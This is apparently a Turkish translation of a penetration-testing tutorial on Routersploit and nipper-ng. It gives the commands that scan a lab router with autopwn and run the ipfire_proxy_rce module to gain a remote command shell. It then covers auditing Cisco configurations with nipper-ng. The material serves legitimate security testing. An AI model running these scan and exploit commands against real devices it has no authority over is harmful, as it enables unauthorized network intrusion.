Router – Switch Sızma Testi

Router – Switch Sızma Testi

Kurumsal ağlarda ve küçük ev ağlarında en az bir router / switch vardır. Buna erişim sağlamış olmanız genellikle tüm ağa erişim sağlamış olmaktasınız anlamına gelmektedir. Kullanıcılar bu tür ağ cihazlarına çok para harcamayı sevmiyor. Çoğu ev routler’ları, zafiyetleri olan eski sürüm yazılımlar kullanmakta. Bugün, iki araca bakacağız: Router’ların ve Switch’lerın zafiyetlerini sömürmek için Routersploit aracı ve yapılandırma dosyalarının denetimi için kullanılan başka bir araç olan nipper-ng aracı.

Routersploit

Routersploit Framework, gömülü cihazlara için üretilmiş açık kaynaklı zafiyet sömürü aracıdır.

Sızma testi işlemlerine yardımcı olan çeşitli modüllerden oluşur:

  • exploits – Tespit edilen güvenlik açıklarından yararlanan modüller
  • creds – Kimlik bilgilerini ağ hizmetlerine karşı test etmek için tasarlanmış modüller
  • scanners – Bir hedefin herhangi bir istismara açık olup olmadığını kontrol eden modüller
  • payloads – Çeşitli mimariler ve enjeksiyon noktaları için yük üretmekten sorumlu modüller
  • generic – Genel saldırılar gerçekleştiren modüller

Routerploit’i kurmak için, önce pip’i kurmamız ve ardından routerersploit’i indirmeniz gerekiyor.

apt-get install python3-pip

git clone https://www.github.com/threat9/routersploit.git/

python3 -m pip install -r requirements.txt

Ayrıca, aracın genel işleyişine yardımcı olacak iki paket daha kurmamız gerekecek:

apt-get install libglib2.0-dev

python3 -m pip install bluepy

Gereksinimlerin ve paketlerin başarılı bir şekilde kurulmasından sonra, aşağıdaki komuta routersploit’i başlatabilirsiniz.

python3 rsf.py

Ana menüde versiyon numarasını görüyoruz. Aşağıdaki komutları kullanarak sürümün her zaman güncel olduğundan emin olabilirsiniz.

cd routersploit

git pull

Araç ile yapabileceklerimizi öğrenmek için “help” komutunu kullanabilirsiniz.

Girişte açıklandığı gibi kullanabileceğimiz tüm modüllerin bir listesi olacaktır. Listedeki bir tarayıcıyı, örnek olarak autopwn’i kullanmak istiyorsanız aşağıdaki komutları yazıyoruz:

search scanners

use scanners/autopwn

Autopwn’i  hedef cihazın kullanılabilir zafiyetlerinin listesini elde edebilmek için seçtik. Araç içerisinde CCTV kameraları gibi belirli amaçlar için kullanılabilen başka tarayıcılar da mevcut.

Bu tarayıcıyı çalıştırmadan önce aşağıdaki komutla exploit arayüzünde bulunan seçeneklere bakacağız:

show options

Tarayıcıyı çalıştırmadan önce bazı ayarları özelleştirmemiz gerekecek. 

target = 192.168.29.200 (Router’ın IP Adresi)

http_port = 444

Not: Taramayı mevcut donanımınız üzerinde yapmak istemiyorsanız, VyOS’u da kurabilirsiniz.

set target 192.168.29.200

set http_port 444

run

Tarayıcıyı çalıştırdıktan sonra, yönlendiricinin aşağıda belirtildiği gibi uzaktan kod çalıştırmaya karşı zafiyetinin olduğunu görüyoruz.

Artık tek yapmanız gereken, zafiyeti seçmek ve çalıştırmak. Bunu yapmak için aşağıdaki komutları kullanabilirsiniz: 

use exploits/routers/ipfire/ipfire_proxy_rce

set target 192.168.29.200

set port 444

run

Router’ı başarıyla kullandık ve bir komut penceresinin açıldığını gördük! Bir test komutu yürütüyoruz ve çalıştığını görüyoruz.

Nipper-ng

Nipper-ng yazılımı, ağ altyapısında router, güvenlik duvarları ve switch gibi birçok farklı cihaz türünün güvenlik yapılandırmaları hakkında gözlem yapmak / denetlemek için kullanılır. Daha önce CiscoParse olarak biliniyordu. 

apt-get install nipper-ng

nipper -h

Yukarıdaki resimde gösterildiği gibi uygulama hakkında ayrıntılı bir yardım penceresi görüntülemek için aşağıdaki komutu kullanabiliriz:

nipper --help

SNMP’nin birçok router ve switch’de yaygın olarak kullanıldığını bildiğimiz için, nipper yazılımındaki SNMP seçeneklerini araştıracağız.

nipper --help=SNMP

Bu komut ile komutta SNMP modülü hakkunda uygulamanın neler sunulabileceğini görüyoruz. Örneğin şunları yapabilir:

  • Geçerli yapılandırmayı bir router’dan alın
  • Cihazın yapılandırmasını yerel olarak depolanan bir * .conf dosyasından veya * .txt dosyasından denetleyin / inceleyin

Diğer komutları da manuel olarak kontrol edebilirsiniz.

Cisco IOS(Internetwork Operating System) tabanlı bir router’ın yapılandırmasını incelemek için bir komut oluşturacağız, ancak aşağıda verilen komut satırı parametrelerinden diğer cihazlar seçilebilir:

–ios-switch Cisco IOS-based Switch

–ios-router Cisco IOS-based Router (default)

–ios-catalyst  Cisco IOS-based Catalyst

–pix       Cisco PIX-based Firewall

–asa       Cisco ASA-based Firewall

–fwsm      Cisco FWSM-based Router

–catos     Cisco CatOS-based Catalyst

–nmp       Cisco NMP-based Catalyst

–css       Cisco Content Services Switch

–screenos  Juniper NetScreen Firewall

–passport  Nortel Passport Device

–sonicos   SonicWall SonicOS Firewall

–fw1       CheckPoint Firewall-1 Firewall

Şimdi, bir router yapılandırma dosyasından bir komut oluşturuyoruz. Cisco router olması durumunda bir yönlendirici yapılandırma dosyasının nasıl yedekleneceğini ve geri yükleneceğini görmek için buradaki bağlantıyı izleyin. Aşağıdaki komutta üç parametre tanımlamamız gerekecek:

ios-router: aygıt türü

input: yönlendirici yapılandırma dosyası

output: denetim raporunun hedefi

Komut aşağıdaki gibidir:

nipper –ios-router –input=/root/Desktop/router.txt –output=report.html

Html belgesi birkaç dakika içinde hazır olacaktır! Raporu HTML olarak incelemek için firefox’ta açıyoruz ve az önce denetlediğimiz ağ cihazının detaylı bir güvenlik raporunu görebiliyoruz!

Bu makalede iki aracı ele aldık: Çeşitli ağ cihazlarının zafiyetlerini sömürmek için kullanılan bir araç olan Routersploit ve ağ cihazlarının yanlış yapılandırmaları hakkında kapsamlı raporlar oluşturan Nipper-ng . Ağ cihazları, çeşitli saldırıları önlemek için en son cihaz yazılımı ile güncellenmelidir ve bu iki araç bu durumlar için yararlı olacaktır. Cihaz yapılandırmalarını manuel olarak kontrol etmek zorunda kalan denetçiler ve güvenlik analistlerinin yüklerini sırtlarından olan kullanışlı araçtır.

Kaynak: https://www.hackingarticles.in/router-penetration-testing/ (Çeviri)

Related Posts

Leave a Reply